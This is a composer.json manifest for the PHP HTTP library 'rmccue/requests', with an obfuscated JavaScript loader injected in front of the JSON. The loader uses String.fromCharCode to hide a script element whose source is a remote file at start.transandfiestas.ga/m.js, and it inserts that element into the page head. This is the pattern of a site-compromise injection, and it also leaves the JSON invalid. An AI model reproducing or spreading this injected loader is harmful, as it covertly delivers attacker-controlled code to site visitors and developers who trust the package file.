Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,114,116,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();{
	"name": "rmccue/requests",
	"description": "A HTTP library written in PHP, for human beings.",
	"homepage": "http://github.com/rmccue/Requests",
	"license": "ISC",
	"keywords": ["http", "idna", "iri", "ipv6", "curl", "sockets", "fsockopen"],
	"authors": [
		{
			"name": "Ryan McCue",
			"homepage": "http://ryanmccue.info"
		}
	],
	"require": {
		"php": ">=5.2"
	},
	"require-dev": {
		"requests/test-server": "dev-master"
	},
	"type": "library",
	"autoload": {
		"psr-0": {"Requests": "library/"}
	}
}
